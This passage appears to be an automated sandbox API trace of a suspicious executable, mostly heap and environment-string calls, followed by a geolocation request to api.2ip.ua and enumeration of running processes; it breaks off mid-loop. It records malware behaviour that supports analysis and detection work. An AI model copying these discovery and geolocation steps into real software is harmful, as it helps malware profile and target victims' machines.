RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x712ca8, Size=0x60) returned 0x712ca8 [0028.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0028.633] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x29) returned 0x70d4f8 [0028.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x70d4f8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0028.633] GetLastError () returned 0x0 [0028.633] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x712ca8) returned 0x60 [0028.633] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x712ca8, Size=0x64) returned 0x712ca8 [0028.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0028.633] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1e) returned 0x711310 [0028.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x711310, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0028.633] GetLastError () returned 0x0 [0028.634] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x712ca8) returned 0x64 [0028.634] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x712ca8, Size=0x68) returned 0x712ca8 [0028.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0028.634] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x41) returned 0x709110 [0028.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x709110, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0028.634] GetLastError () returned 0x0 [0028.634] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x712ca8) returned 0x68 [0028.634] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x712ca8, Size=0x6c) returned 0x712ca8 [0028.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0028.634] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x17) returned 0x707988 [0028.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x707988, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0028.634] GetLastError () returned 0x0 [0028.634] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x712ca8) returned 0x6c [0028.634] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x712ca8, Size=0x70) returned 0x712ca8 [0028.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0028.634] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xf) returned 0x7109f0 [0028.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x7109f0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0028.634] GetLastError () returned 0x0 [0028.634] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x712ca8) returned 0x70 [0028.634] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x712ca8, Size=0x74) returned 0x712ca8 [0028.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0028.634] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x16) returned 0x7079a8 [0028.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x7079a8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0028.634] GetLastError () returned 0x0 [0028.634] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x712ca8) returned 0x74 [0028.634] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x712ca8, Size=0x78) returned 0x712ca8 [0028.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0028.634] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x2a) returned 0x70d530 [0028.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x70d530, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0028.634] GetLastError () returned 0x0 [0028.634] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x712ca8) returned 0x78 [0028.634] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x712ca8, Size=0x7c) returned 0x712ca8 [0028.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0028.634] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x29) returned 0x70d568 [0028.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x70d568, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0028.634] GetLastError () returned 0x0 [0028.635] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x712ca8) returned 0x7c [0028.635] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x712ca8, Size=0x80) returned 0x712ca8 [0028.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0028.635] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x15) returned 0x7079c8 [0028.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x7079c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0028.635] GetLastError () returned 0x0 [0028.635] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x712ca8) returned 0x80 [0028.635] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x712ca8, Size=0x84) returned 0x712ca8 [0028.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0028.635] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1e) returned 0x712d50 [0028.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x712d50, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0028.635] GetLastError () returned 0x0 [0028.635] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x712ca8) returned 0x84 [0028.635] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x712ca8, Size=0x88) returned 0x712ca8 [0028.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0028.635] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x2a) returned 0x70d5a0 [0028.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x70d5a0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0028.635] GetLastError () returned 0x0 [0028.635] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x712ca8) returned 0x88 [0028.635] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x712ca8, Size=0x8c) returned 0x713538 [0028.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0028.635] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x12) returned 0x7079e8 [0028.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x7079e8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0028.635] GetLastError () returned 0x0 [0028.635] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713538) returned 0x8c [0028.635] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x713538, Size=0x90) returned 0x713538 [0028.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0028.635] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x18) returned 0x707a08 [0028.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x707a08, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0028.635] GetLastError () returned 0x0 [0028.635] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713538) returned 0x90 [0028.635] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x713538, Size=0x94) returned 0x713538 [0028.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0028.635] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x46) returned 0x709160 [0028.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x709160, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0028.636] GetLastError () returned 0x0 [0028.636] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713538) returned 0x94 [0028.636] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x713538, Size=0x98) returned 0x713538 [0028.636] GetLastError () returned 0x0 [0028.690] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713f18) returned 0x80 [0028.691] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713f18) returned 0x80 [0028.691] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713f18) returned 0x80 [0028.714] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x8ec) returned 0x713fa0 [0028.770] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713f18) returned 0x80 [0028.770] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x10) returned 0x710a08 [0028.770] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713f18) returned 0x80 [0028.770] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713f18) returned 0x80 [0028.771] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713f18) returned 0x80 [0028.811] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x713f18) returned 0x80 [0028.823] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0029.763] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x40) returned 0x706bc0 [0029.763] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0036.351] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18aff8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18d7f8 | out: lpBuffer=0x18aff8*, lpdwNumberOfBytesRead=0x18d7f8*=0x1d1) returned 1 [0036.352] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0036.355] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0036.355] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x20) returned 0x71ed58 [0036.361] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x1e0) returned 0x3248958 [0036.366] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x3248958 | out: hHeap=0x6f0000) returned 1 [0036.371] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x71ed58 | out: hHeap=0x6f0000) returned 1 [0036.371] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x706bc0 | out: hHeap=0x6f0000) returned 1 [0036.371] GetCurrentProcess () returned 0xffffffff [0036.371] GetLastError () returned 0x2 [0036.371] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0036.376] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x10) returned 0x740498 [0036.376] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x8ec) returned 0x3265878 [0036.381] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x800) returned 0x74d780 [0036.381] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x74d780, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\penelop0611_2019-11-06_10-30.exe_.exe")) returned 0x4b [0036.381] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0036.387] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x810) returned 0x325cfe0 [0036.387] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe\" " [0036.387] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe\" ", pNumArgs=0x18d8d8 | out: pNumArgs=0x18d8d8) returned 0x3280fd0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe" [0036.387] lstrcpyW (in: lpString1=0x18e568, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe" [0036.393] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe\" " [0036.393] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe\" ", pNumArgs=0x18d874 | out: pNumArgs=0x18d874) returned 0x3280fd0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe" [0036.436] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe") returned="penelop0611_2019-11-06_10-30.exe_.exe" [0036.436] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76c20000 [0036.437] GetProcAddress (hModule=0x76c20000, lpProcName="EnumProcesses") returned 0x0 [0036.437] GetProcAddress (hModule=0x76c20000, lpProcName="EnumProcessModules") returned 0x0 [0036.437] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleBaseNameW") returned 0x0 [0036.437] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x75140000 [0036.441] GetProcAddress (hModule=0x75140000, lpProcName="EnumProcesses") returned 0x75141544 [0036.441] GetProcAddress (hModule=0x75140000, lpProcName="EnumProcessModules") returned 0x75141408 [0036.441] GetProcAddress (hModule=0x75140000, lpProcName="GetModuleBaseNameW") returned 0x7514152c [0036.441] EnumProcesses (in: lpidProcess=0x183070, cb=0xa000, lpcbNeeded=0x18d880 | out: lpidProcess=0x183070, lpcbNeeded=0x18d880) returned 1 [0036.444] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0036.444] CloseHandle (hObject=0x0) returned 0 [0036.444] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0036.444] CloseHandle (hObject=0x0) returned 0 [0036.444] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0036.444] CloseHandle (hObject=0x0) returned 0 [0036.444] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0036.444] CloseHandle (hObject=0x0) returned 0 [0036.444] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0036.444] CloseHandle (hObject=0x0) returned 0 [0036.444] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0036.444] CloseHandle (hObject=0x0) returned 0 [0036.444] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0036.444] CloseHandle (hObject=0x0) returned 0 [0036.444] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0036.444] CloseHandle (hObject=0x0) returned 0 [0036.444] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0036.445] CloseHandle (hObject=0x0) returned 0 [0036.445] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0036.445] CloseHandle (hObject=0x0) returned 0 [0036.445] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0036.445] CloseHandle (hObject=0x0) returned 0 [0036.445] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0036.445] CloseHandle (hObject=0x0) returned 0 [0036.445] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0036.445] CloseHandle (hObject=0x0) returned 0 [0036.445] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0036.445] CloseHandle (hObject=0x0) returned 0 [0036.445] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0036.445] CloseHandle (hObject=0x0) returned 0 [0036.445] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0036.445] CloseHandle (hObject=0x0) returned 0 [0036.445] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0036.445] CloseHandle (hObject=0x0) returned 0 [0036.445] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0036.445] CloseHandle (hObject=0x0) returned 0 [0036.445] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x448) returned 0x5b8 [0036.445] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 0 [0036.446] CloseHandle (hObject=0x5b8) returned 1 [0036.446] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x45c) returned 0x5b8 [0036.446] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 0 [0036.446] CloseHandle (hObject=0x5b8) returned 1 [0036.446] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0036.446] CloseHandle (hObject=0x0) returned 0 [0036.446] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4ac) returned 0x5b8 [0036.446] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 0 [0036.446] CloseHandle (hObject=0x5b8) returned 1 [0036.446] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0036.446] CloseHandle (hObject=0x0) returned 0 [0036.446] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x50c) returned 0x5b8 [0036.446] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 0 [0036.447] CloseHandle (hObject=0x5b8) returned 1 [0036.447] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5f0) returned 0x0 [0036.447] CloseHandle (hObject=0x0) returned 0 [0036.447] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x354) returned 0x5b8 [0036.447] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0036.448] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0xae0000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="chairs.exe") returned 0xa [0036.448] CloseHandle (hObject=0x5b8) returned 1 [0036.448] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5a8) returned 0x5b8 [0036.448] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0036.449] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x170000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="im_disability.exe") returned 0x11 [0036.449] CloseHandle (hObject=0x5b8) returned 1 [0036.450] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x59c) returned 0x5b8 [0036.450] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0036.450] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x10c0000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="audi.exe") returned 0x8 [0036.451] CloseHandle (hObject=0x5b8) returned 1 [0036.451] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6e4) returned 0x5b8 [0036.451] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0036.452] GetModuleBaseNameW (in: hProcess=0x5b8, hModule=0x10e0000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="eliminategeographylyrics.exe") returned 0x1c [0036.452] CloseHandle (hObject=0x5b8) returned 1 [0036.452] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x440) returned 0x5b8 [0036.452] EnumProcessModules (in: hProcess=0x5b8, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) 